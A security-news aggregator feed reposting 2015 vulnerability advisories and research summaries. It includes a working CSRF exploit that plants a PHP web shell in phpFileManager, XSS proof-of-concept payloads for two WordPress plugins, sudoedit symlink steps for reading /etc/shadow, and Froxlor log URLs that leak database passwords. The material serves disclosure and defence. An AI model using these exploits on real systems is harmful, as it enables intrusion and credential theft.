Angler Exploit Kit Used to Find and Infect PoS Systems

July 28, 2015, 7:02 am

≫ Next: CROSS DISTRIBUTION EXPLOIT TESTING (INCLUSIVE TESTING Redhat Local Privilege Escalation CVE-2015-3245,3246 and more...)

≪ Previous: White Paper: Just In Time Malware Assembly: Advanced Evasion Techniques

An attack aiming to infect PoS systems was found using the Angler Exploit Kit to push a PoS reconnaissance Trojan,This Trojan, detected as TROJ_RECOLOAD.A, checks for multiple conditions in the infected system like if it is a PoS machine or part of a PoS network. It then proceeds to download specific malware depending on the conditions met. We’ve also found that this utilizes the fileless installation capability of the Angler Exploit Kit to avoid detection.

Looking into its infection chain, we found that part of its reconnaissance involves searching for data related to specific websites and companies. One example would be Verifone, a company that offers solutions for electronic payments and PoS transactions. Based on the infection chain, we also believe that this attack is targeting web-based terminals.

This finding suggests that attackers are now looking for ways to deploy PoS malware on a wider scale. Just recently, we discovered a PoS threat that piggybacks on the established Andromeda botnet to reach PoS systems.

more here....................http://blog.trendmicro.com/trendlabs-security-intelligence/angler-exploit-kit-used-to-find-and-infect-pos-systems/

↧

CROSS DISTRIBUTION EXPLOIT TESTING (INCLUSIVE TESTING Redhat Local Privilege Escalation CVE-2015-3245,3246 and more...)

July 28, 2015, 7:54 am

≫ Next: [OSSA 2015-013] Glance task flow may fail to delete image from backend (CVE-2015-3289)

≪ Previous: Angler Exploit Kit Used to Find and Infect PoS Systems

We were looking for an easy way to do testing for the installation of our tool, Faraday
https://github.com/infobyte/faraday with different distributions.

We wanted to do this because the installation process is normally one of the most complicated and critical processes of any new tool being implemented. It is important that the process is easy and that everything works without any hiccups so that users can get started using the tool ASAP and don´t lose valuable time during the installation and set-up.

What we ended up finding to suit our needs was Docker, which is pretty similar to a chroot, but on large amounts of steroids.

Docker is a tool that automates the deployment of applications inside software containers, by providing an additional layer of abstraction and automation of operating-system-level virtualization on Linux. Docker uses resource isolation features of the Linux kernel such as cgroups and kernel namespaces to allow independent "containers" to run within a single Linux instance, avoiding the overhead of starting and maintaining virtual machines

The process we developed is pretty simple, in which we use a simple list of distributions.
We generate a Docker
We install Faraday
We connect using the SSH to the container, exporting the X and we execute the graphic application (GUI QT)
If one of the processes doesn´t work, we can evaluate what was the cause of the problem and we make a corresponding patch to remedy the problem .

We are using this process daily in our own continuous-integration system.

read on here..................http://blog.infobytesec.com/2015/07/cross-distribution-exploit-testing.html

↧

[OSSA 2015-013] Glance task flow may fail to delete image from backend (CVE-2015-3289)

July 28, 2015, 9:48 am

≫ Next: Guest Diary: Xavier Mertens - Integrating VirusTotal within ELK

≪ Previous: CROSS DISTRIBUTION EXPLOIT TESTING (INCLUSIVE TESTING Redhat Local Privilege Escalation CVE-2015-3245,3246 and more...)

=====================================================================
OSSA-2015-013: Glance task flow may fail to delete image from backend
=====================================================================

:Date: July 28, 2015
:CVE: CVE-2015-3289


Affects
~~~~~~~
- Glance: versions 2015.1.0


Description
~~~~~~~~~~~
Abhishek Kekane from NTT reported a vulnerability in Glance. By
creating numerous images using the import task flow API and deleting
them, an authenticated attacker may accumulate untracked image data in
the backend resulting in potential resource exhaustion and denial of
service. All glance setups are affected.


Patches
~~~~~~~
- https://review.openstack.org/#/c/181816/ (Kilo)
- https://review.openstack.org/#/c/181345/ (Liberty)


Credits
~~~~~~~
- Abhishek Kekane from NTT (CVE-2015-3289)


References
~~~~~~~~~~
- https://launchpad.net/bugs/1454087
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3289


Notes
~~~~~
- This fix will be included in the future 2015.1.1 (kilo) release.

↧

Guest Diary: Xavier Mertens - Integrating VirusTotal within ELK

July 28, 2015, 12:12 pm

≫ Next: Reflected XSS in Flickr Justified Gallery could allows unauthenticated attackers to do almost anything an admin can do (WordPress plugin)

≪ Previous: [OSSA 2015-013] Glance task flow may fail to delete image from backend (CVE-2015-3289)

Visualisation is a key when you need to keep control of what’s happening on networks which carry daily tons of malicious files. virustotal.com is a key player in fighting malwares on a daily basis. Not only, you can submit and search for samples on their website but they also provide an API to integrate virustotal.com in your software or scripts. A few days ago, Didiers Stevens posted some SANS ISC diaries about the Integration of VirusTotal into Microsoft sysinternal tools (here, here and here). The most common API call is to query the database for a hash. If the file was already submitted by someone else and successfilly scanned, you’ll get back interesting results, the most known being the file score in the form “x/y”. The goal of my setup is to integrate virustotal.com within my ELK setup. To feed virustotal, hashes of interesting files must be computed. I’m getting interesting hashes via my Suricata IDS which inspect all the Internet traffic passing through my network.

The first step is to configure the MD5 hashes support in Suricata.

more here....................https://isc.sans.edu/diary/+Guest+Diary%3A+Xavier+Mertens+-+Integrating+VirusTotal+within+ELK/19967

↧

Reflected XSS in Flickr Justified Gallery could allows unauthenticated attackers to do almost anything an admin can do (WordPress plugin)

July 28, 2015, 2:50 pm

≫ Next: The Avast Series

≪ Previous: Guest Diary: Xavier Mertens - Integrating VirusTotal within ELK

Details
================
Software: Flickr Justified Gallery
Version: 3.3.6
Homepage: https://wordpress.org/plugins/flickr-justified-gallery/
Advisory report: https://security.dxw.com/advisories/reflected-xss-in-flickr-justified-gallery-could-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
Reflected XSS in Flickr Justified Gallery could allows unauthenticated attackers to do almost anything an admin can do

Vulnerability
================
This plugin contains a reflected XSS vulnerability which would allow an unauthenticated attacker to do almost anything an admin user can do.
For this to happen, the administrator would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.

Proof of concept
================
Visit a page containing the following in Firefox or any other browser with no reflected XSS mitigation strategies, and click submit:
<form action=\"http://localhost/wp-admin/options-general.php?page=fjgwpp.php\" method=\"POST\">
<input type=\"text\" name=\"fjgwpp_userID\" value=\":"><script>alert(1)</script>\">
<input type=\"text\" name=\"Submit\" value=\"Save Changes\">
<input type=\"submit\">
</form>

Mitigations
================
Upgrade to version 3.4.0 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2015-07-21: Discovered
2015-07-22: Reported to vendor via email
2015-07-22: Requested CVE
2015-07-23: Vendor responded confirming fixed in 3.4.0
2015-07-28: Published

Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

↧

The Avast Series

July 28, 2015, 6:01 pm

≫ Next: Hardening Android's Bionic libc

≪ Previous: Reflected XSS in Flickr Justified Gallery could allows unauthenticated attackers to do almost anything an admin can do (WordPress plugin)

I spent some time quite a while ago looking into avast! and, after about a year, I am going to post about the issues that were found, and fixed back then. The whole project was pretty fun, avast! offers a lot of functionalities and as such a ton of components to look into. Identifying the security boundaries and attack surface required a decent understanding of the product: services, opened ports, LPC or RPC interfaces, kernel drivers and their IO controls or filters, browser components, various parsers, "self-defense", etc.

A decent number of issues were found, and Igor and the avast! bug bounty team fixed them promptly, and extensively - I think they did a great job at not concentrating on the specific issues submitted but thinking about the bigger picture, variants and remediation.

I will start with one of the juicier ones, as it allowed RCE from a browser here................http://expertmiami.blogspot.com/2015/07/the-avast-series.html

↧

Hardening Android's Bionic libc

July 28, 2015, 6:04 pm

≫ Next: CVE-2015-5477: An error in handling TKEY queries can cause named to exit with a REQUIRE assertion failure in BIND

≪ Previous: The Avast Series

This article provides an overview of the security improvements implemented in the CopperheadOS libc. The improvements are available in Copperhead’s Bionic repository on GitHub and a subset of the work has been submitted upstream. The intention is to upstream as much as possible. However, CopperheadOS fills a different niche than vanilla Android so it can make sacrifices to performance, memory usage and compatibility that aren’t suitable in the upstream project.

All of the CopperheadOS repositories are now public on GitHub and an alpha release with pre-built ROMs for the Nexus 5 and Samsung Galaxy S4 will happen in the near future. Build instructions will also be posted soon.

read on here...............https://copperhead.co/2015/07/27/hardening-bionic

↧

CVE-2015-5477: An error in handling TKEY queries can cause named to exit with a REQUIRE assertion failure in BIND

July 28, 2015, 6:12 pm

≫ Next: Debugging Apps on Android Emulator Using GDB

≪ Previous: Hardening Android's Bionic libc

A deliberately constructed packet can exploit an error in the handling of queries for TKEY records, permitting denial of service.

CVE:

CVE-2015-5477

Document Version:

2.0

Posting date:

28 July 2015

Program Impacted:

BIND

Versions affected:

9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2

Severity:

Critical

Exploitable:

Remotely

Description:

An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.

Impact:

Both recursive and authoritative servers are vulnerable to this defect. Additionally, exposure is not prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling, before checks enforcing those boundaries.

All versions of BIND 9 from BIND 9.1.0 (inclusive) through BIND 9.9.7-P1 and BIND 9.10.2-P2 are vulnerable.

Operators should take steps to upgrade to a patched version as soon as possible.

CVSS Score: 7.8

CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:C)

For more information on the Common Vulnerability Scoring System and to obtain your specific environmental score please visit: https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:N/I:N/A:C)

Workarounds:

None.

Active exploits:

None known.

Solution: Upgrade to the patched release most closely related to your current version of BIND. These can be downloaded from http://www.isc.org/downloads.

BIND 9 version 9.9.7-P2
BIND 9 version 9.10.2-P3

Acknowledgements: ISC would like to thank Jonathan Foote for discovering and disclosing this vulnerability.

Document Revision History:

1.0 Advance Notification - 21 July, 2015
2.0 Public Disclosure - 28 July, 2015

Related Documents:

See our BIND9 Security Vulnerability Matrix at https://kb.isc.org/article/AA-00913 for a complete listing of Security Vulnerabilities and versions affected.

If you'd like more information on ISC Subscription Support and Advance Security Notifications, please visit http://www.isc.org/services

Do you still have questions? Questions regarding this advisory should go to security-officer@isc.org. To report a new issue, please encrypt your message using security-officer@isc.org's PGP key which can be found here:https://www.isc.org/downloads/software-support-policy/openpgp-key/. If you are unable to use encrypted email, you may also report new issues at: https://www.isc.org/community/report-bug/.

Note: ISC patches only currently supported versions. When possible we indicate EOL versions affected. (For current information on which versions are actively supported, please see http://www.isc.org/downloads/).

ISC Security Vulnerability Disclosure Policy: Details of our current security advisory policy and practice can be found here: https://kb.isc.org/article/AA-00861/164/ISC-Software-Defect-and-Security-Vulnerability-Disclosure-Policy.html

This Knowledge Base article https://kb.isc.org/article/AA-01272 is the complete and official security advisory document.

Legal Disclaimer:
Internet Systems Consortium (ISC) is providing this notice on an "AS IS" basis. No warranty or guarantee of any kind is expressed in this notice and none should be implied. ISC expressly excludes and disclaims any warranties regarding this notice or materials referred to in this notice, including, without limitation, any implied warranty of merchantability, fitness for a particular purpose, absence of hidden defects, or of non-infringement. Your use or reliance on this notice or materials referred to in this notice is at your own risk. ISC may change this notice at any time. A stand-alone copy or paraphrase of the text of this document that omits the document URL is an uncontrolled copy. Uncontrolled copies may lack important information, be out of date, or contain factual errors.

↧

Debugging Apps on Android Emulator Using GDB

July 28, 2015, 6:44 pm

≫ Next: Paper: Forensic Analysis of WhatsApp Messenger on Android Smartphones

≪ Previous: CVE-2015-5477: An error in handling TKEY queries can cause named to exit with a REQUIRE assertion failure in BIND

This article shows how to debug a process running on a rooted Android device or emulator. Debugging a process is an essential task in order to find memory corruption like vulnerabilities in an application.

Prerequisites to follow the steps:

Set up an Android Emulator
NDK – This can be downloaded from the link below
http://developer.android.com/tools/sdk/ndk/index.html

What are we going to do here?

In simple steps, this is what we are going to do:

Set up GDB Server on the emulator
Connect to the GDB server from the client
Start debugging

Let’s begin here.................http://resources.infosecinstitute.com/android-hacking-and-security-part-20-debugging-apps-on-android-emulator-using-gdb/

↧

Paper: Forensic Analysis of WhatsApp Messenger on Android Smartphones

July 28, 2015, 8:07 pm

≫ Next: Paper: Comparison between security majors in virtual machine and linux containers

≪ Previous: Debugging Apps on Android Emulator Using GDB

We present the forensic analysis of the artifacts left on Android devices by \textit{WhatsApp Messenger}, the client of the WhatsApp instant messaging system. We provide a complete description of all the artifacts generated by WhatsApp Messenger, we discuss the decoding and the interpretation of each one of them, and we show how they can be correlated together to infer various types of information that cannot be obtained by considering each one of them in isolation.
By using the results discussed in this paper, an analyst will be able to reconstruct the list of contacts and the chronology of the messages that have been exchanged by users. Furthermore, thanks to the correlation of multiple artifacts, (s)he will be able to infer information like when a specific contact has been added, to recover deleted contacts and their time of deletion, to determine which messages have been deleted, when these messages have been exchanged, and the users that exchanged them.

more here..............................http://arxiv.org/pdf/1507.07739v1.pdf

↧

Paper: Comparison between security majors in virtual machine and linux containers

July 29, 2015, 4:56 am

≫ Next: PHP FileManager v0.9.8 CSRF Backdoor Shell

≪ Previous: Paper: Forensic Analysis of WhatsApp Messenger on Android Smartphones

Virtualization started to gain traction in the domain of information technology in the early 2000s when managing resource distribution was becoming an uphill task for developers. As a result, tools like VMWare, Hyper V (hypervisor) started making inroads into the software repository on different operating systems. VMWare and Hyper V could support multiple virtual machines running on them with each having their own isolated environment. Due to this isolation, the security aspects of virtual machines (VMs) did not differ much from that of physical machines (having a dedicated operating system on hardware). The advancement made in the domain of linux containers (LXC) has taken virtualization to an altogether different level where resource utilization by various applications has been further optimized. But the container security has assumed primary importance amongst the researchers today and this paper is inclined towards providing a brief overview about comparisons between security of container and VMs

more here..............................http://arxiv.org/ftp/arxiv/papers/1507/1507.07816.pdf

Source Image: diginomica.com

[Advert: Unifysec Vulnerability Auditing Tool utilizing multiple scanners performs 200+ Website Security Checks/configuration issues and Counting. Click here to Try it Free Today]

↧

PHP FileManager v0.9.8 CSRF Backdoor Shell

July 29, 2015, 4:59 am

≫ Next: MFFA - Media Fuzzing Framework for Android (Stagefright fuzzer)

≪ Previous: Paper: Comparison between security majors in virtual machine and linux containers

[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0729.txt



Vendor:
================================
phpfm.sourceforge.net



Product:
============================
phpFileManager version 0.9.8


Vulnerability Type:
==========================
CSRF Remote Backdoor Shell



CVE Reference:
==============
N/A



Advisory Information:
========================================
CSRF Remote Backdoor Shell Vulnerability




Vulnerability Details:
=======================================================================
PHP File Manager is vulnerable to creation of arbitrary files on server
via CSRF which we can use to create remote backdoor shell access if victim
clicks our malicious linx or visits our malicious webpages. 

To create backdoor shell we will need to execute two POST requests
1- to create PHP backdoor shell 666.php 
2- inject code and save to the backdoor we just created

e.g.
https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ] 


Exploit code(s):
===============

<script>
var scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)

var maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
blasphemer(maliciouso)

function blasphemer(payload){
 var xhr=new XMLHttpRequest()
 xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
 xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
 xhr.send(payload)
}
</script>



Disclosure Timeline:
=========================================================


Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+] POST


Vulnerable Product:             [+] phpFileManager 0.9.8


Vulnerable Parameter(s):        [+] action, cmd_arg, file_data, chmod_arg, save_file


Affected Area(s):               [+] Web Server


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


by hyp3rlinx

↧

MFFA - Media Fuzzing Framework for Android (Stagefright fuzzer)

July 29, 2015, 5:18 am

≫ Next: Laika BOSS: Object Scanning System

≪ Previous: PHP FileManager v0.9.8 CSRF Backdoor Shell

The main idea behind this project is to create corrupt but structurally valid media files, direct them to the appropriate software components in Android to be decoded and/or played and monitor the system for potential issues (i.e system crashes) that may lead to exploitable vulnerabilities. Custom developed Python scripts are used to send the malformed data across a distributed infrastructure of Android devices, log the findings and monitor for possible issues, in an automated manner. The actual decoding of the media files on the Android devices is done using the Stagefright command line interface. The results are sorted out, in an attempt to find only the unique issues, using a custom built triage mechanism.

more here.............................https://github.com/fuzzing/MFFA

↧

Laika BOSS: Object Scanning System

July 29, 2015, 5:26 am

≫ Next: Trend Micro Discovers Vulnerability That Renders Android Devices Silent

≪ Previous: MFFA - Media Fuzzing Framework for Android (Stagefright fuzzer)

Laika is an object scanner and intrusion detection system that strives to achieve the following goals:

Scalable
Work across multiple systems
High volume of input from many sources
Flexible
Modular architecture
Highly configurable dispatching and dispositioning logic
Tactical code insertion (without needing restart)
Verbose
Generate more metadata than you know what to do with

Each scan does three main actions on each object:

Explode children

Some objects are archives, some are wrappers, and others are obfuscators. Whatever the case may be, find children objects that should be scanned recursively by exploding them out.

Mark flags

Flags provide a means for dispositioning objects and for pivoting on future analysis.

Add metadata

Discover as much information describing the object for future analysis.

More information here including white paper from Lockheed Martin.......................https://github.com/lmco/laikaboss

↧

Trend Micro Discovers Vulnerability That Renders Android Devices Silent

July 29, 2015, 7:39 am

≫ Next: Cobalt Strike 2.5 – Advanced Pivoting (Video Included)

≪ Previous: Laika BOSS: Object Scanning System

We have discovered a vulnerability in Android that can render a phone apparently dead – silent, unable to make calls, with a lifeless screen. This vulnerability is present from Android 4.3 (Jelly Bean) up to the current version, Android 5.1.1 (Lollipop). Combined, these versions account for more than half of Android devices in use today. No patch has been issued in the Android Open Source Project (AOSP) code by the Android Engineering Team to fix this vulnerability since we reported it in late May.

This vulnerability can be exploited in two ways: either via a malicious app installed on the device, or through a specially-crafted web site. The first technique can cause long-term effects to the device: an app with an embedded MKV file that registers itself to auto-start whenever the device boots would case the OS to crash every time it is turned on.

In some ways, this vulnerability is similar to the recently discovered Stagefright vulnerability. Both vulnerabilities are triggered when Android handles media files, although the way these files reach the user differs.

more here...............http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-vulnerability-that-renders-android-devices-silent/

↧

Cobalt Strike 2.5 – Advanced Pivoting (Video Included)

July 29, 2015, 7:41 am

≫ Next: Unveiling Nuclear EK (IV)

≪ Previous: Trend Micro Discovers Vulnerability That Renders Android Devices Silent

I spend a lot of my red time in the Access Manager role. This is the person on a red team who manages callbacks for the red cell. Sometimes, I like to grab a Beacon and drive around a network. It’s important to get out once in a while and enjoy what’s there. Cobalt Strike 2.5 is all about cruising around networks.

Lateral Movement++
This release adds native lateral movement options to Beacon. Use the psexec_psh, winrm, and wmi commands to deliver a Beacon to a target using PowerShell to avoid touching disk.

more here................http://blog.cobaltstrike.com/2015/07/29/cobalt-strike-2-5-advanced-pivoting/

↧

Unveiling Nuclear EK (IV)

July 29, 2015, 7:49 am

≫ Next: Cross-Site Scripting (XSS) in qTranslate WordPress Plugin

≪ Previous: Cobalt Strike 2.5 – Advanced Pivoting (Video Included)

In the previous post we managed to Obtain Original the SWF, but discovered That the exploit is embedded in a ByteArray. Will we be Able to Obtain it?

First of all, we must extract the contents stored in the ByteArray. To Do This, we need a Flash decompiler desktop: Adobe SWF Investigator (It's free!). Once installed we open the last file obtained: uncompressed_exploit.swf . We go to " Tag Viewer "and select" DefineBinaryData "among all the tags. Then we save it by clicking in " Dump to file "and naming it as" dump_exploit.bin ", for example.

read on here.............http://www.securityartwork.es/2015/07/29/unveiling-nuclear-ek-iv/

↧

Cross-Site Scripting (XSS) in qTranslate WordPress Plugin

July 29, 2015, 7:53 am

≫ Next: Sudo

≪ Previous: Unveiling Nuclear EK (IV)

Advisory ID: HTB23265
Product: qTranslate WordPress plugin
Vendor: Qian Qin
Vulnerable Version(s): 2.5.39 and probably prior
Tested Version: 2.5.39
Advisory Publication: July 1, 2015 [without technical details]
Vendor Notification: July 1, 2015
Public Disclosure: July 29, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-5535
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in qTranslate WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against website administrators. Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application, if the victim visits a malicious page with XSS exploit. This vulnerability can also be used to perform drive-by-download or phishing attacks against website administrators.

Input passed via "edit" HTTP GET parameter to "/wp-admin/options-general.php" is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

A simple exploit below will display a JS popup with "ImmuniWeb" word:

http://wordpress/wp-admin/options-general.php?page=qtranslate&edit=%22%3E%3Cscript%3Ealert%28%2FImmuniWeb%2F%29%3B%3C%2
Fscript%3E

-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2015-07-01 Vendor notified via email, no reply.
2015-07-10 Vendor notified via emails and support thread on the WordPress plugin page, no reply.
2015-07-17 Vendor notified via emails, no reply.
2015-07-28 Fix requested via emails, no reply.
2015-07-29 Public disclosure.

Currently we are not aware of any official solution from the vendor. As at temporary solution we strongly recommend
disabling the vulnerable plugin.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23265 - https://www.htbridge.com/advisory/HTB23265 - Cross-Site Scripting (XSS) in qTranslate WordPress Plugin.
[2] qTranslate WordPress plugin - http://www.qianqin.de/ - qTranslate makes creation of multilingual content as easy as working with a single language.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

↧

Sudo

July 29, 2015, 3:02 pm

≫ Next: Froxlor - information leak

≪ Previous: Cross-Site Scripting (XSS) in qTranslate WordPress Plugin

# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation
# Date: 07-23-2015
# Exploit Author: Daniel Svartman
# Version: Sudo <=1.8.14
# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
# CVE: CVE-2015-5602.

Hello,

I found a security bug in sudo (checked in the latest versions of sudo
running on RHEL and ubuntu) when a user is granted with root access to
modify a particular file that could be located in a subset of directories.

It seems that sudoedit does not check the full path if a wildcard is used
twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
file.txt real file with a symbolic link to a different location (e.g.
/etc/shadow).

I was able to perform such redirect and retrieve the data from the
/etc/shadow file.

In order for you to replicate this, you should configure the following line
in your /etc/sudoers file:

<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt

Then, logged as that user, create a subdirectory within its home folder
(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
inside the new folder named test.txt pointing to /etc/shadow.

When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
be allowed to access the /etc/shadow even if have not been granted with
such access in the sudoers file.

I checked this against fixed directories and files (not using a wildcard)
and it does work with symbolic links created under the /home folder.

↧

Froxlor - information leak

July 29, 2015, 3:04 pm

≫ Next: XSS vulnerability in Wordpress plugin The Holiday Calendar

≪ Previous: Sudo

Affects
=====
- Froxlor 0.9.33.1 and earlier

Fixed
====
- Froxlor 0.9.33.2

Summary
========

An unauthenticated remote attacker is able to get the database password via webaccess due to wrong file permissions of the /logs/ folder in froxlor version 0.9.33.1 and earlier. The plain SQL password and username may be stored in the /logs/sql-error.log file. This directory is publicly reachable under the default configuration/setup.

Notes
=====
Some default URLs are:
http://website.tld/froxlor/logs/sql-error.log
http://cp.website.tld/logs/sql-error.log
http://froxlor.website.tld/logs/sql-error.log

The certain section looks like this:

/var/www/froxlor/lib/classes/database/class.Database.php(279): PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'PLAIN_DATABASE_PW', Array)

Please note that the password in the logfile is truncated to 15 chars, therefore passwords longer than 15 chars are not fully visible to an attacker.

Patches
======
- log db errors to syslog instead of /logs/sql-error.log file:

https://github.com/Froxlor/Froxlor/commit/4ec376b29671593a50556630551e04e34bc83c1c
- replace passwords even before logging:

https://github.com/Froxlor/Froxlor/commit/8558533a9148a2a0302c9c177abff8e4e4075b92

↧

Latest Images